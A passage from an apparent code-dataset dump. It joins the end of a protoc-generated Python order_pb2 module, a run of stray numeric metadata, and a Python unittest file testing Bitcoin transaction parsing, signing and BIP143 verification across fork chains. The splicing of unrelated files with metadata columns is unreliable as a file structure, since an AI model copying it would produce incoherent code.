      number=11, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=4364,
  serialized_end=4570,
)
# --- Descriptor cross-linking (generated by protoc; do not hand-edit) ---
# Resolve message/enum field types that could not be set while the
# descriptors above were being constructed, and attach each synthetic
# map-entry message to its containing message.
_ORDERCREATEREQ.fields_by_name['orders'].message_type = _ORDERCREATEINFO
_ORDERCREATEINFO_LABELSENTRY.containing_type = _ORDERCREATEINFO
_ORDERCREATEINFO.fields_by_name['order_items'].message_type = _ORDERITEMCREATEINFO
_ORDERCREATEINFO.fields_by_name['address'].message_type = _ORDERADDRESSCREATEINFO
_ORDERCREATEINFO.fields_by_name['labels'].message_type = _ORDERCREATEINFO_LABELSENTRY
_ORDERCREATEINFO.fields_by_name['discounts'].message_type = _ORDERDISCOUNTCREATEINFO
_ORDERDISCOUNTCREATEINFO.fields_by_name['discount_info'].message_type = _ORDERDISCOUNTINFO
_ORDERLISTRESULT.fields_by_name['data'].message_type = _ORDER
_ORDERLISTRESULT.fields_by_name['code'].enum_type = code__pb2._CODE
_ORDERCREATERESULT.fields_by_name['orders'].message_type = _ORDER
_ORDERCREATERESULT.fields_by_name['errors'].message_type = _CREATEORDERERROR
_ORDERCREATERESULT.fields_by_name['code'].enum_type = code__pb2._CODE
_MERCHANTORDERCREATEREQ_LABELSENTRY.containing_type = _MERCHANTORDERCREATEREQ
_MERCHANTORDERCREATEREQ.fields_by_name['labels'].message_type = _MERCHANTORDERCREATEREQ_LABELSENTRY
_MERCHANTORDERCREATEREQ.fields_by_name['discounts'].message_type = _ORDERDISCOUNTCREATEINFO
_MERCHANTORDERCREATERESULT.fields_by_name['code'].enum_type = code__pb2._CODE
_MERCHANTORDERCREATERESULT.fields_by_name['order'].message_type = _ORDER
_ORDER_LABELSENTRY.containing_type = _ORDER
# Some field types live in other generated modules (code_pb2,
# order_review_pb2, order_settlement_pb2, settlement_pb2).
_ORDER.fields_by_name['review_info'].message_type = order__review__pb2._ORDERREVIEWINFO
_ORDER.fields_by_name['items'].message_type = _ORDERITEM
_ORDER.fields_by_name['address'].message_type = _ORDERADDRESS
_ORDER.fields_by_name['labels'].message_type = _ORDER_LABELSENTRY
_ORDER.fields_by_name['settlements'].message_type = order__settlement__pb2._ORDERSETTLEMENTV2
_ORDERITEM_SKUPROPENTRY.containing_type = _ORDERITEM
_ORDERITEM_LABELSENTRY.containing_type = _ORDERITEM
_ORDERITEM.fields_by_name['sku_prop'].message_type = _ORDERITEM_SKUPROPENTRY
_ORDERITEM.fields_by_name['labels'].message_type = _ORDERITEM_LABELSENTRY
_ORDERITEM.fields_by_name['gradient_rebate_rates'].message_type = settlement__pb2._GRADIENTREBATERATE
_ORDERUPDATECONTENT.fields_by_name['action_params'].message_type = _ORDERUPDATEACTIONPARAMS
_ORDERUPDATEACTIONPARAMS_LABELSENTRY.containing_type = _ORDERUPDATEACTIONPARAMS
_ORDERUPDATEACTIONPARAMS.fields_by_name['packages'].message_type = _ORDERPACKAGEUPDATEPARAM
_ORDERUPDATEACTIONPARAMS.fields_by_name['labels'].message_type = _ORDERUPDATEACTIONPARAMS_LABELSENTRY
_ORDERUPDATEACTIONPARAMS.fields_by_name['address'].message_type = _ORDERADDRESSUPDATEPARAM
# Register every top-level message type with this file's descriptor.
DESCRIPTOR.message_types_by_name['OrderCreateReq'] = _ORDERCREATEREQ
DESCRIPTOR.message_types_by_name['OrderCreateInfo'] = _ORDERCREATEINFO
DESCRIPTOR.message_types_by_name['OrderItemCreateInfo'] = _ORDERITEMCREATEINFO
DESCRIPTOR.message_types_by_name['OrderAddressCreateInfo'] = _ORDERADDRESSCREATEINFO
DESCRIPTOR.message_types_by_name['OrderDiscountCreateInfo'] = _ORDERDISCOUNTCREATEINFO
DESCRIPTOR.message_types_by_name['OrderDiscountInfo'] = _ORDERDISCOUNTINFO
DESCRIPTOR.message_types_by_name['OrderListResult'] = _ORDERLISTRESULT
DESCRIPTOR.message_types_by_name['OrderCreateResult'] = _ORDERCREATERESULT
DESCRIPTOR.message_types_by_name['CreateOrderError'] = _CREATEORDERERROR
DESCRIPTOR.message_types_by_name['MerchantOrderCreateReq'] = _MERCHANTORDERCREATEREQ
DESCRIPTOR.message_types_by_name['MerchantOrderCreateResult'] = _MERCHANTORDERCREATERESULT
DESCRIPTOR.message_types_by_name['Order'] = _ORDER
DESCRIPTOR.message_types_by_name['OrderItem'] = _ORDERITEM
DESCRIPTOR.message_types_by_name['OrderAddress'] = _ORDERADDRESS
DESCRIPTOR.message_types_by_name['OrderUpdateContent'] = _ORDERUPDATECONTENT
DESCRIPTOR.message_types_by_name['OrderUpdateActionParams'] = _ORDERUPDATEACTIONPARAMS
DESCRIPTOR.message_types_by_name['OrderPackageUpdateParam'] = _ORDERPACKAGEUPDATEPARAM
DESCRIPTOR.message_types_by_name['OrderAddressUpdateParam'] = _ORDERADDRESSUPDATEPARAM
# Publish the fully-linked file descriptor to the default symbol database.
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
# --- Concrete message classes (generated by protoc; do not hand-edit) ---
# Each class is materialized from its descriptor via the reflection API and
# registered with the symbol database; nested map-entry classes are created
# inline.  These are the names importers of this module actually use.
OrderCreateReq = _reflection.GeneratedProtocolMessageType('OrderCreateReq', (_message.Message,), {
  'DESCRIPTOR' : _ORDERCREATEREQ,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.OrderCreateReq)
  })
_sym_db.RegisterMessage(OrderCreateReq)

OrderCreateInfo = _reflection.GeneratedProtocolMessageType('OrderCreateInfo', (_message.Message,), {
  'LabelsEntry' : _reflection.GeneratedProtocolMessageType('LabelsEntry', (_message.Message,), {
    'DESCRIPTOR' : _ORDERCREATEINFO_LABELSENTRY,
    '__module__' : 'order_pb2'
    # @@protoc_insertion_point(class_scope:order.OrderCreateInfo.LabelsEntry)
    })
  ,
  'DESCRIPTOR' : _ORDERCREATEINFO,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.OrderCreateInfo)
  })
_sym_db.RegisterMessage(OrderCreateInfo)
_sym_db.RegisterMessage(OrderCreateInfo.LabelsEntry)

OrderItemCreateInfo = _reflection.GeneratedProtocolMessageType('OrderItemCreateInfo', (_message.Message,), {
  'DESCRIPTOR' : _ORDERITEMCREATEINFO,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.OrderItemCreateInfo)
  })
_sym_db.RegisterMessage(OrderItemCreateInfo)

OrderAddressCreateInfo = _reflection.GeneratedProtocolMessageType('OrderAddressCreateInfo', (_message.Message,), {
  'DESCRIPTOR' : _ORDERADDRESSCREATEINFO,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.OrderAddressCreateInfo)
  })
_sym_db.RegisterMessage(OrderAddressCreateInfo)

OrderDiscountCreateInfo = _reflection.GeneratedProtocolMessageType('OrderDiscountCreateInfo', (_message.Message,), {
  'DESCRIPTOR' : _ORDERDISCOUNTCREATEINFO,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.OrderDiscountCreateInfo)
  })
_sym_db.RegisterMessage(OrderDiscountCreateInfo)

OrderDiscountInfo = _reflection.GeneratedProtocolMessageType('OrderDiscountInfo', (_message.Message,), {
  'DESCRIPTOR' : _ORDERDISCOUNTINFO,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.OrderDiscountInfo)
  })
_sym_db.RegisterMessage(OrderDiscountInfo)

OrderListResult = _reflection.GeneratedProtocolMessageType('OrderListResult', (_message.Message,), {
  'DESCRIPTOR' : _ORDERLISTRESULT,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.OrderListResult)
  })
_sym_db.RegisterMessage(OrderListResult)

OrderCreateResult = _reflection.GeneratedProtocolMessageType('OrderCreateResult', (_message.Message,), {
  'DESCRIPTOR' : _ORDERCREATERESULT,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.OrderCreateResult)
  })
_sym_db.RegisterMessage(OrderCreateResult)

CreateOrderError = _reflection.GeneratedProtocolMessageType('CreateOrderError', (_message.Message,), {
  'DESCRIPTOR' : _CREATEORDERERROR,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.CreateOrderError)
  })
_sym_db.RegisterMessage(CreateOrderError)

MerchantOrderCreateReq = _reflection.GeneratedProtocolMessageType('MerchantOrderCreateReq', (_message.Message,), {
  'LabelsEntry' : _reflection.GeneratedProtocolMessageType('LabelsEntry', (_message.Message,), {
    'DESCRIPTOR' : _MERCHANTORDERCREATEREQ_LABELSENTRY,
    '__module__' : 'order_pb2'
    # @@protoc_insertion_point(class_scope:order.MerchantOrderCreateReq.LabelsEntry)
    })
  ,
  'DESCRIPTOR' : _MERCHANTORDERCREATEREQ,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.MerchantOrderCreateReq)
  })
_sym_db.RegisterMessage(MerchantOrderCreateReq)
_sym_db.RegisterMessage(MerchantOrderCreateReq.LabelsEntry)

MerchantOrderCreateResult = _reflection.GeneratedProtocolMessageType('MerchantOrderCreateResult', (_message.Message,), {
  'DESCRIPTOR' : _MERCHANTORDERCREATERESULT,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.MerchantOrderCreateResult)
  })
_sym_db.RegisterMessage(MerchantOrderCreateResult)

Order = _reflection.GeneratedProtocolMessageType('Order', (_message.Message,), {
  'LabelsEntry' : _reflection.GeneratedProtocolMessageType('LabelsEntry', (_message.Message,), {
    'DESCRIPTOR' : _ORDER_LABELSENTRY,
    '__module__' : 'order_pb2'
    # @@protoc_insertion_point(class_scope:order.Order.LabelsEntry)
    })
  ,
  'DESCRIPTOR' : _ORDER,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.Order)
  })
_sym_db.RegisterMessage(Order)
_sym_db.RegisterMessage(Order.LabelsEntry)

# OrderItem carries two map fields, so it gets two nested entry classes.
OrderItem = _reflection.GeneratedProtocolMessageType('OrderItem', (_message.Message,), {
  'SkuPropEntry' : _reflection.GeneratedProtocolMessageType('SkuPropEntry', (_message.Message,), {
    'DESCRIPTOR' : _ORDERITEM_SKUPROPENTRY,
    '__module__' : 'order_pb2'
    # @@protoc_insertion_point(class_scope:order.OrderItem.SkuPropEntry)
    })
  ,
  'LabelsEntry' : _reflection.GeneratedProtocolMessageType('LabelsEntry', (_message.Message,), {
    'DESCRIPTOR' : _ORDERITEM_LABELSENTRY,
    '__module__' : 'order_pb2'
    # @@protoc_insertion_point(class_scope:order.OrderItem.LabelsEntry)
    })
  ,
  'DESCRIPTOR' : _ORDERITEM,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.OrderItem)
  })
_sym_db.RegisterMessage(OrderItem)
_sym_db.RegisterMessage(OrderItem.SkuPropEntry)
_sym_db.RegisterMessage(OrderItem.LabelsEntry)

OrderAddress = _reflection.GeneratedProtocolMessageType('OrderAddress', (_message.Message,), {
  'DESCRIPTOR' : _ORDERADDRESS,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.OrderAddress)
  })
_sym_db.RegisterMessage(OrderAddress)

OrderUpdateContent = _reflection.GeneratedProtocolMessageType('OrderUpdateContent', (_message.Message,), {
  'DESCRIPTOR' : _ORDERUPDATECONTENT,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.OrderUpdateContent)
  })
_sym_db.RegisterMessage(OrderUpdateContent)

OrderUpdateActionParams = _reflection.GeneratedProtocolMessageType('OrderUpdateActionParams', (_message.Message,), {
  'LabelsEntry' : _reflection.GeneratedProtocolMessageType('LabelsEntry', (_message.Message,), {
    'DESCRIPTOR' : _ORDERUPDATEACTIONPARAMS_LABELSENTRY,
    '__module__' : 'order_pb2'
    # @@protoc_insertion_point(class_scope:order.OrderUpdateActionParams.LabelsEntry)
    })
  ,
  'DESCRIPTOR' : _ORDERUPDATEACTIONPARAMS,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.OrderUpdateActionParams)
  })
_sym_db.RegisterMessage(OrderUpdateActionParams)
_sym_db.RegisterMessage(OrderUpdateActionParams.LabelsEntry)

OrderPackageUpdateParam = _reflection.GeneratedProtocolMessageType('OrderPackageUpdateParam', (_message.Message,), {
  'DESCRIPTOR' : _ORDERPACKAGEUPDATEPARAM,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.OrderPackageUpdateParam)
  })
_sym_db.RegisterMessage(OrderPackageUpdateParam)

OrderAddressUpdateParam = _reflection.GeneratedProtocolMessageType('OrderAddressUpdateParam', (_message.Message,), {
  'DESCRIPTOR' : _ORDERADDRESSUPDATEPARAM,
  '__module__' : 'order_pb2'
  # @@protoc_insertion_point(class_scope:order.OrderAddressUpdateParam)
  })
_sym_db.RegisterMessage(OrderAddressUpdateParam)

# Standard protoc footer: clear the eagerly-parsed options caches so options
# (e.g. map_entry and deprecated-field markers) are lazily re-derived from
# the serialized descriptor data on first access.
DESCRIPTOR._options = None
_ORDERCREATEINFO_LABELSENTRY._options = None
_MERCHANTORDERCREATEREQ_LABELSENTRY._options = None
_ORDER_LABELSENTRY._options = None
_ORDERITEM_SKUPROPENTRY._options = None
_ORDERITEM_LABELSENTRY._options = None
_ORDERITEM.fields_by_name['user_rebate_rate']._options = None
_ORDERITEM.fields_by_name['merchant_apportion_rebate_rate']._options = None
_ORDERITEM.fields_by_name['platform_apportion_rebate_rate']._options = None
_ORDERUPDATEACTIONPARAMS_LABELSENTRY._options = None
# @@protoc_insertion_point(module_scope)
| 50.857419
| 8,624
| 0.752518
| 13,659
| 105,224
| 5.482905
| 0.031261
| 0.057684
| 0.087527
| 0.071023
| 0.806879
| 0.765112
| 0.750317
| 0.739234
| 0.72452
| 0.7066
| 0
| 0.039696
| 0.122814
| 105,224
| 2,068
| 8,625
| 50.882012
| 0.771682
| 0.016707
| 0
| 0.744648
| 1
| 0.003058
| 0.145632
| 0.105712
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004077
| 0
| 0.004077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
fca26d622ffde8796ac42ef4ee97225b77d45f35
| 30,673
|
py
|
Python
|
tx_test.py
|
benharold/hardforkhelp
|
5300f68847a56451a7272dc345e3c9a3109170c7
|
[
"MIT"
] | null | null | null |
tx_test.py
|
benharold/hardforkhelp
|
5300f68847a56451a7272dc345e3c9a3109170c7
|
[
"MIT"
] | null | null | null |
tx_test.py
|
benharold/hardforkhelp
|
5300f68847a56451a7272dc345e3c9a3109170c7
|
[
"MIT"
] | null | null | null |
from binascii import hexlify, unhexlify
from io import BytesIO
from unittest import TestCase
from ecc import PrivateKey, S256Point, Signature
from helper import (
p2pkh_script,
SIGHASH_ALL,
)
from script import Script
from tx import Tx, TxIn, TxOut, BCDTx, BTGTx, SBTCTx, BCHTx, B2XTx
class TxTest(TestCase):
    """Tests for transaction parsing, fee computation, signature hashing,
    signing and verification — for plain BTC transactions (legacy and
    segwit/BIP143) and for several hard-fork chains (BCH, BTG, BCD, SBTC, B2X).

    Several tests resolve input values/scripts over the network via the
    class-level sockets on Tx/TxIn; tearDownClass closes those sockets.
    """

    # Mainnet P2PKH tx (1 input, 2 outputs) reused by most parse tests below.
    # Hoisted here so the long hex literal appears exactly once.
    RAW_TX_1 = unhexlify('0100000001813f79011acb80925dfe69b3def355fe914bd1d96a3f5f71bf8303c6a989c7d1000000006b483045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed01210349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278afeffffff02a135ef01000000001976a914bc3b654dca7e56b04dca18f2566cdaf02e8d9ada88ac99c39800000000001976a9141c4bc762dd5423e332166702cb75f40df79fea1288ac19430600')

    @classmethod
    def tearDownClass(cls):
        # Tx and TxIn cache network sockets at class level for UTXO lookups;
        # close and clear them so later test classes start with a clean slate.
        for owner in (TxIn, Tx):
            for attr in ('mainnet_socket', 'testnet_socket'):
                sock = getattr(owner, attr)
                if sock is not None:
                    sock.close()
                    setattr(owner, attr, None)

    def _parse_main_tx(self):
        # Helper: fresh parse of RAW_TX_1 (parse consumes the stream, so each
        # test needs its own BytesIO).
        return Tx.parse(BytesIO(self.RAW_TX_1))

    def test_parse_version(self):
        tx = self._parse_main_tx()
        self.assertEqual(tx.version, 1)

    def test_parse_inputs(self):
        tx = self._parse_main_tx()
        self.assertEqual(len(tx.tx_ins), 1)
        # prev_tx is stored in internal (little-endian) byte order.
        want = unhexlify('d1c789a9c60383bf715f3f6ad9d14b91fe55f3deb369fe5d9280cb1a01793f81')
        self.assertEqual(tx.tx_ins[0].prev_tx, want)
        self.assertEqual(tx.tx_ins[0].prev_index, 0)
        want = unhexlify('483045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed01210349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278a')
        self.assertEqual(tx.tx_ins[0].script_sig.serialize(), want)
        self.assertEqual(tx.tx_ins[0].sequence, 0xfffffffe)

    def test_parse_outputs(self):
        tx = self._parse_main_tx()
        self.assertEqual(len(tx.tx_outs), 2)
        self.assertEqual(tx.tx_outs[0].amount, 32454049)
        want = unhexlify('76a914bc3b654dca7e56b04dca18f2566cdaf02e8d9ada88ac')
        self.assertEqual(tx.tx_outs[0].script_pubkey.serialize(), want)
        self.assertEqual(tx.tx_outs[1].amount, 10011545)
        want = unhexlify('76a9141c4bc762dd5423e332166702cb75f40df79fea1288ac')
        self.assertEqual(tx.tx_outs[1].script_pubkey.serialize(), want)

    def test_parse_locktime(self):
        tx = self._parse_main_tx()
        self.assertEqual(tx.locktime, 410393)

    def test_der_signature(self):
        tx = self._parse_main_tx()
        # der_signature() splits the scriptSig push into (DER sig, hash type).
        want = b'3045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed'
        der, hash_type = tx.tx_ins[0].der_signature()
        self.assertEqual(hexlify(der), want)
        self.assertEqual(hash_type, SIGHASH_ALL)

    def test_sec_pubkey(self):
        tx = self._parse_main_tx()
        want = b'0349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278a'
        self.assertEqual(hexlify(tx.tx_ins[0].sec_pubkey()), want)

    def test_serialize(self):
        # Round-trip: parse then serialize must reproduce the raw bytes.
        tx = self._parse_main_tx()
        self.assertEqual(tx.serialize(), self.RAW_TX_1)

    def test_input_value(self):
        # Input value is looked up from the referenced output (network fetch).
        tx_hash = 'd1c789a9c60383bf715f3f6ad9d14b91fe55f3deb369fe5d9280cb1a01793f81'
        tx_in = TxIn(
            prev_tx=unhexlify(tx_hash),
            prev_index=0,
            script_sig=b'',
            sequence=0,
        )
        self.assertEqual(tx_in.value(), 42505594)

    def test_input_pubkey(self):
        tx_hash = 'd1c789a9c60383bf715f3f6ad9d14b91fe55f3deb369fe5d9280cb1a01793f81'
        tx_in = TxIn(
            prev_tx=unhexlify(tx_hash),
            prev_index=0,
            script_sig=b'',
            sequence=0,
        )
        want = unhexlify('76a914a802fc56c704ce87c42d7c92eb75e7896bdc41ae88ac')
        self.assertEqual(tx_in.script_pubkey().serialize(), want)

    def test_fee(self):
        # fee = sum(input values) - sum(output values)
        tx = self._parse_main_tx()
        self.assertEqual(tx.fee(), 40000)
        # A 4-input, 2-output transaction.
        raw_tx = unhexlify('010000000456919960ac691763688d3d3bcea9ad6ecaf875df5339e148a1fc61c6ed7a069e010000006a47304402204585bcdef85e6b1c6af5c2669d4830ff86e42dd205c0e089bc2a821657e951c002201024a10366077f87d6bce1f7100ad8cfa8a064b39d4e8fe4ea13a7b71aa8180f012102f0da57e85eec2934a82a585ea337ce2f4998b50ae699dd79f5880e253dafafb7feffffffeb8f51f4038dc17e6313cf831d4f02281c2a468bde0fafd37f1bf882729e7fd3000000006a47304402207899531a52d59a6de200179928ca900254a36b8dff8bb75f5f5d71b1cdc26125022008b422690b8461cb52c3cc30330b23d574351872b7c361e9aae3649071c1a7160121035d5c93d9ac96881f19ba1f686f15f009ded7c62efe85a872e6a19b43c15a2937feffffff567bf40595119d1bb8a3037c356efd56170b64cbcc160fb028fa10704b45d775000000006a47304402204c7c7818424c7f7911da6cddc59655a70af1cb5eaf17c69dadbfc74ffa0b662f02207599e08bc8023693ad4e9527dc42c34210f7a7d1d1ddfc8492b654a11e7620a0012102158b46fbdff65d0172b7989aec8850aa0dae49abfb84c81ae6e5b251a58ace5cfeffffffd63a5e6c16e620f86f375925b21cabaf736c779f88fd04dcad51d26690f7f345010000006a47304402200633ea0d3314bea0d95b3cd8dadb2ef79ea8331ffe1e61f762c0f6daea0fabde022029f23b3e9c30f080446150b23852028751635dcee2be669c2a1686a4b5edf304012103ffd6f4a67e94aba353a00882e563ff2722eb4cff0ad6006e86ee20dfe7520d55feffffff0251430f00000000001976a914ab0c0b2e98b1ab6dbf67d4750b0a56244948a87988ac005a6202000000001976a9143c82d7df364eb6c75be8c80df2b3eda8db57397088ac46430600')
        tx = Tx.parse(BytesIO(raw_tx))
        self.assertEqual(tx.fee(), 140500)

    def test_sig_hash(self):
        tx = self._parse_main_tx()
        tx.testnet = True
        hash_type = SIGHASH_ALL
        want = int('27e0c5994dec7824e56dec6b2fcb342eb7cdb0d0957c2fce9882f715e85d81a6', 16)
        self.assertEqual(tx.sig_hash(0, hash_type), want)

    def test_verify_input1(self):
        # Legacy P2PKH input.
        tx = self._parse_main_tx()
        self.assertTrue(tx.verify_input(0))

    def test_verify_input2(self):
        # P2SH multisig input.
        raw_tx = unhexlify('0100000001868278ed6ddfb6c1ed3ad5f8181eb0c7a385aa0836f01d5e4789e6bd304d87221a000000db00483045022100dc92655fe37036f47756db8102e0d7d5e28b3beb83a8fef4f5dc0559bddfb94e02205a36d4e4e6c7fcd16658c50783e00c341609977aed3ad00937bf4ee942a8993701483045022100da6bee3c93766232079a01639d07fa869598749729ae323eab8eef53577d611b02207bef15429dcadce2121ea07f233115c6f09034c0be68db99980b9a6c5e75402201475221022626e955ea6ea6d98850c994f9107b036b1334f18ca8830bfff1295d21cfdb702103b287eaf122eea69030a0e9feed096bed8045c8b98bec453e1ffac7fbdbd4bb7152aeffffffff04d3b11400000000001976a914904a49878c0adfc3aa05de7afad2cc15f483a56a88ac7f400900000000001976a914418327e3f3dda4cf5b9089325a4b95abdfa0334088ac722c0c00000000001976a914ba35042cfe9fc66fd35ac2224eebdafd1028ad2788acdc4ace020000000017a91474d691da1574e6b3c192ecfb52cc8984ee7b6c568700000000')
        tx = Tx.parse(BytesIO(raw_tx))
        self.assertTrue(tx.verify_input(0))

    def test_sign_input(self):
        private_key = PrivateKey(secret=8675309)
        prev_tx = unhexlify('0025bc3c0fa8b7eb55b9437fdbd016870d18e0df0ace7bc9864efc38414147c8')
        tx_ins = [TxIn(
            prev_tx=prev_tx,
            prev_index=0,
            script_sig=b'',
            sequence=0xffffffff,
        )]
        # Pre-populate the cached value/script so no network lookup is needed.
        tx_ins[0]._value = 110000000
        tx_ins[0]._script_pubkey = Script.parse(private_key.point.p2pkh_script())
        tx_outs = []
        h160 = Tx.get_address_data('mzx5YhAH9kNHtcN481u6WkjeHjYtVeKVh2')['h160']
        tx_outs.append(TxOut(amount=int(0.99*100000000), script_pubkey=p2pkh_script(h160)))
        h160 = Tx.get_address_data('mnrVtF8DWjMu839VW3rBfgYaAfKk8983Xf')['h160']
        tx_outs.append(TxOut(amount=int(0.1*100000000), script_pubkey=p2pkh_script(h160)))
        tx = Tx(
            version=1,
            tx_ins=tx_ins,
            tx_outs=tx_outs,
            locktime=0,
            testnet=True,
        )
        self.assertTrue(tx.sign_input(0, private_key, SIGHASH_ALL))

    def test_is_coinbase(self):
        raw_tx = unhexlify('01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff5e03d71b07254d696e656420627920416e74506f6f6c20626a31312f4542312f4144362f43205914293101fabe6d6d678e2c8c34afc36896e7d9402824ed38e856676ee94bfdb0c6c4bcd8b2e5666a0400000000000000c7270000a5e00e00ffffffff01faf20b58000000001976a914338c84849423992471bffb1a54a8d9b1d69dc28a88ac00000000')
        tx = Tx.parse(BytesIO(raw_tx))
        self.assertTrue(tx.is_coinbase())

    def test_coinbase_height(self):
        # BIP34: the block height is the first push of the coinbase scriptSig.
        raw_tx = unhexlify('01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff5e03d71b07254d696e656420627920416e74506f6f6c20626a31312f4542312f4144362f43205914293101fabe6d6d678e2c8c34afc36896e7d9402824ed38e856676ee94bfdb0c6c4bcd8b2e5666a0400000000000000c7270000a5e00e00ffffffff01faf20b58000000001976a914338c84849423992471bffb1a54a8d9b1d69dc28a88ac00000000')
        tx = Tx.parse(BytesIO(raw_tx))
        self.assertEqual(tx.coinbase_height(), 465879)
        # A non-coinbase transaction has no coinbase height.
        tx = self._parse_main_tx()
        self.assertIsNone(tx.coinbase_height())

    def test_sig_hash_bip143(self):
        # BCH uses the BIP143 sighash algorithm for all inputs.
        raw_tx = unhexlify('0100000001fd5145175fafdee6d20ac376e376cf26d933848ba5aa177d0d163a462fb3f183010000006b483045022100f49a17e80098bc057e319b890bdc42fe7224e7f6beb69a650102f802239be154022069742f504fdd52906c14d0d18ff0808e01146813775602163ec10d419270c1c541210223f1c80f382f086e2af7ad9d05227d94b6cf292596b9853f04a91194048f9048ffffffff0236820100000000001976a914dc10e999a5f18eb510feec09206d1812fa24a9c288ac5c058049000000001976a91421704f258089af191df1a4abed2b48ec11d6063e88ac00000000')
        tx = BCHTx.parse(BytesIO(raw_tx))
        tx_in = tx.tx_ins[0]
        # The funding transaction, used to seed the input's value/script cache.
        raw_tx2 = unhexlify('010000000185037eb5531900f2f450e55cd950c509310229c0444e318a8811eecfa3b5c183010000006b483045022100f4a6e308ff7846bd19d394ec1b7263e051f2a60e6819feb006cdb9047bdd21a502206d969dfb5dfee3e53ed1a79b441d1cc2b7b8fe945ac7507c3b5e180565fbaead4121037765d8921f9559a6f03d620a1687a57e5b4ecb9efa5b41fc44555da0a376f81affffffff021ffc6c00000000001976a914fe1f6bea216c790c30d07f52966850268a3f90a788acfc8b8149000000001976a9142563b8536a228ec866e1c1084044a7730e53758888ac00000000')
        tx2 = BCHTx.parse(BytesIO(raw_tx2))
        tx_in._value = tx2.tx_outs[1].amount
        tx_in._script_pubkey = tx2.tx_outs[1].script_pubkey
        der, hash_type = tx_in.der_signature()
        sec = tx_in.sec_pubkey()
        sig = Signature.parse(der)
        point = S256Point.parse(sec)
        z = tx.sig_hash_bip143(0, hash_type)
        self.assertTrue(point.verify(z, sig))
        self.assertTrue(tx.verify_input(0))
        self.assertTrue(tx.verify())

    def test_segwit(self):
        # P2SH-wrapped P2WPKH input; check the BIP143 intermediate hashes.
        raw_tx = unhexlify('01000000000101db6b1b20aa0fd7b23880be2ecbd4a98130974cf4748fb66092ac4d3ceb1a5477010000001716001479091972186c449eb1ded22b78e40d009bdf0089feffffff02b8b4eb0b000000001976a914a457b684d7f0d539a46a45bbc043f35b59d0d96388ac0008af2f000000001976a914fd270b1ee6abcaea97fea7ad0402e8bd8ad6d77c88ac02473044022047ac8e878352d3ebbde1c94ce3a10d057c24175747116f8288e5d794d12d482f0220217f36a485cae903c713331d877c1f64677e3622ad4010726870540656fe9dcb012103ad1d8e89212f0b92c74d23bb710c00662ad1470198ac48c43f7d6f93a2a2687392040000')
        tx = Tx.parse(BytesIO(raw_tx))
        tx.tx_ins[0]._script_pubkey = Script.parse(unhexlify('a9144733f37cf4db86fbc2efed2500b4f4e49f31202387'))
        tx.tx_ins[0]._value = 1000000000
        want = b'b0287b4a252ac05af83d2dcef00ba313af78a3e9c329afa216eb3aa2a7b4613a'
        self.assertEqual(hexlify(tx.hash_prevouts()), want)
        want = b'18606b350cd8bf565266bc352f0caddcf01e8fa789dd8a15386327cf8cabe198'
        self.assertEqual(hexlify(tx.hash_sequence()), want)
        want = b'de984f44532e2173ca0d64314fcefe6d30da6f8cf27bafa706da61df8a226c83'
        self.assertEqual(hexlify(tx.hash_outputs()), want)
        want = b'01000000b0287b4a252ac05af83d2dcef00ba313af78a3e9c329afa216eb3aa2a7b4613a18606b350cd8bf565266bc352f0caddcf01e8fa789dd8a15386327cf8cabe198db6b1b20aa0fd7b23880be2ecbd4a98130974cf4748fb66092ac4d3ceb1a5477010000001976a91479091972186c449eb1ded22b78e40d009bdf008988ac00ca9a3b00000000feffffffde984f44532e2173ca0d64314fcefe6d30da6f8cf27bafa706da61df8a226c839204000001000000'
        self.assertEqual(hexlify(tx.sig_hash_preimage_bip143(0, 1)), want)
        self.assertEqual(tx.serialize(), raw_tx)
        self.assertTrue(tx.verify())
        # Second segwit transaction: round-trip and verify only.
